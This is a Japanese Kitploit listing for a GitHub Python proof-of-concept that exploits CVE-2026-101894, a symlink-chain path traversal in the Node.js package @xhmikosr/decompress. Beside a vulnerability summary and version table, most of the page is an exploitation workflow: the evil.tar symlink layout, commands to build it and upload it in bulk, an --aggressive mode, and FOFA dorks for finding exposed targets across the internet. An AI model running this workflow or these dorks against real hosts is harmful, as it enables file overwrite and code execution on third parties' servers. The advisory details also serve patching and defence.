Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-101894 — CVE-2026-101894 の Python PoC: @xhmikosr/decompress におけるシンボリックリンクチェーンによるパストラバーサル。ローカル Node ラボ、lockfile バージョンスキャン、および大量の evil.tar アップロードエクスプロイトを含みます。 | Kitploit
ツール/GitHubGitHub/murrez/cve-2026-101894
偵察脆弱性スキャナー脆弱性分析エクスプロイトスクリプトと自動化ウェブアプリケーション悪用情報収集ペネトレーションテストサプライチェーンセキュリティ
GitHubmurrez/cve-2026-101894

CVE-2026-101894

CVE-2026-101894 の Python PoC: @xhmikosr/decompress におけるシンボリックリンクチェーンによるパストラバーサル。ローカル Node ラボ、lockfile バージョンスキャン、および大量の evil.tar アップロードエクスプロイトを含みます。

4日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2026-101894 — @xhmikosr/decompress シンボリックリンクチェーンによるパストラバーサル

CVE-2026-101894 の Python 3 PoC — @xhmikosr/decompress(およびメンテナンスされていない decompress)における Node.js のアーカイブ展開は、シンボリックリンクエントリの連鎖を介して 出力ディレクトリ外への読み取り/書き込みを可能にします。CVE-2026-53486 のハードニングのバイパスです。CVSS 3.1 9.1 Critical。

PoCbithttps://pocbit.org/pocs/cve-2026-101894
Cataloghttps://pocbit.org/pocs/
Package@xhmikosr/decompress(メンテナンス済み)、decompress(kevva、未パッチ)
APIデフォルトの decompress(input, output)
CWECWE-22 パストラバーサル、CWE-59 リンクフォロー
Fixed10.2.2(10.x)、11.1.4(11.x)
GHSAGHSA-hrh2-vp3x-79xf

脆弱性の概要(Türkçe)

decompress は tar/zip などのアーカイブを対象フォルダに展開する際に字句的なパスチェックを適用しますが、連続するシンボリックリンクエントリにより、カーネルが後続のエントリを出力ディレクトリ外で解決する可能性があります。攻撃者が制御するアーカイブにより、config、startup script、または機密ファイルを上書き/読み取り可能 → RCE シナリオ(CI、コンテナ、アップロード+展開サービス)。

@xhmikosr/decompress の修正: 10.2.2 および 11.1.4。旧 decompress パッケージは 4.2.1 まで同じクラスに属し、パッチは提供されません — @xhmikosr/[email protected]+ に移行してください。


この PoC の動作

モード目的
--lablab/ 内に 11.1.3 をインストールし、evil.tar シンボリックリンクチェーンによる外部への書き込みを検証
--write-evil-tarペイロードアーカイブをディスクに書き込む(POCBIT-101894-ESCAPED マーカー)
checkリモートターゲットの package.json / lockfile → バージョンがリスクありか?
exploitシンボリックリンクチェーンの evil.tar で一般的なアップロードパスに POST(大量一括)
mass--list + -j;hits.txt / exploited.txt

リモートエクスプロイトは、サーバーが実際にアーカイブを decompress で展開していることを証明するものではありません;2xx アップロード受理 + 脆弱バージョンのフィンガープリントで exploited と見なされます。確実な証拠には --lab を使用してください。

hits.txt と exploited.txt(よくある状況)

段階何を証明するか
check → hits.txt/package.json または /package-lock.json が公開されており、中に脆弱な decompress が含まれる
exploit → exploited.txtPoC が試行した一般的なアップロード URL のうち少なくとも 1 つが HTTP 2xx を返した

FOFA Express リストでは 500 スキャン → 2 ヒットは正常です。2 ヒット + 0 エクスプロイト(vulnerable_dep_no_upload_endpoint)も正常です:依存関係の漏洩 ≠ 公開アーカイブアップロード。この CVE の悪用には、アプリケーションが信頼できないアーカイブを decompress() で展開する必要があります;HID / ランダムな :8088 サイトでは、PoC の 8〜11 個のデフォルトパスのほとんどが存在しないことが多いです。

# チェーンの証拠(ローカル)
python poc.py --lab

# ヒット: 依存関係のみ + アップロード試行
python poc.py --list hits.txt --mode exploit -j 2
# 期待値: upload_ok=0, status vulnerable_dep_no_upload_endpoint

影響を受けるバージョン

パッケージ脆弱修正済み
@xhmikosr/decompress 11.x11.0.0 – 11.1.3≥ 11.1.4
@xhmikosr/decompress 10.x< 10.2.2≥ 10.2.2
decompress(kevva)≤ 4.2.1なし — 移行

要件

cd CVE-2026-101894
pip install -r requirements.txt

ラボ: PATH 上の Node.js + npm(シンボリックリンク展開の挙動には Linux/macOS を推奨)。


使用方法

ローカルラボ(推奨の証明)

python poc.py --lab
python poc.py --write-evil-tar evil.tar

リモートチェック

python poc.py -u https://app.example --mode check
python poc.py --list targets.example.txt --mode check -j 30 --vuln-list hits.txt

リモートエクスプロイト(大量)

python poc.py -u https://app.example --mode exploit --aggressive
python poc.py --list hits.txt --mode exploit -j 10 --aggressive --upload-paths /api/upload,/upload
フラグ意味
--labローカル Node 展開 PoC
--aggressive脆弱な lockfile が公開されていなくてもエクスプロイト
--upload-pathsカスタムのカンマ区切り POST パス
--exploited-listアップロードが 2xx を返したターゲット

evil.tar の構造(概念)

シンボリックリンクチェーン(簡略化):

  1. a/b/c/up → ../..
  2. a/b/escape → c/up/../..
  3. esc → ..
  4. マーカーペイロードを含む通常ファイル …/pocbit_escape.txt

11.1.4 リリースノートに記載された シンボリックリンクチェーンバイパスクラス(realpath / 包含修正)に一致します。


大量ワークフロー

FOFA JSON → python _format_fofa.py fofa_results_1000.json
           → fofa_results_1000.json (url), fofa_results_1000.csv, fofa_targets_1000.txt

python poc.py --list fofa_targets_1000.txt --mode check -j 40  → hits.txt
python poc.py --list fofa_results_1000.csv --mode check -j 40   # url column
python poc.py --list hits.txt --mode exploit -j 8 --aggressive  → exploited.txt

アップロード/zip の FOFA dork リスト(fofa_results_1000)は、Express のみの 500 リストよりもエクスプロイト対象として適しています;それでも ヒット = lockfile + 脆弱な decompress、エクスプロイト = アップロード 2xx です。


FOFA / ディスカバリ(Node アプリ)

body="node_modules/@xhmikosr/decompress"
body="\"decompress\"" && body="package-lock.json"
header="X-Powered-By: Express" && body="/package.json"

(lockfile が本番で公開されることは稀ですが、チェックによりステージング、CI アーティファクト、設定ミスのある静的ホスティングがしばしば見つかります。)


参考資料

  • PoCbit CVE-2026-101894
  • CVE.report
  • v11.1.4 リリース
  • 以前: CVE-2026-53486 / GHSA-mp2f-45pm-3cg9

法的注意

評価を許可されたシステムのみをテストしてください。悪意のあるアーカイブを第三者の本番サービスにアップロードしないでください。


GitHub リポジトリの説明

CVE-2026-101894 PoC: @xhmikosr/decompress symlink-chain archive path traversal (bypass CVE-2026-53486). Node lab + lockfile scan + mass evil.tar upload exploit. CVSS 9.1. https://pocbit.org/pocs/cve-2026-101894
ツールをダウンロード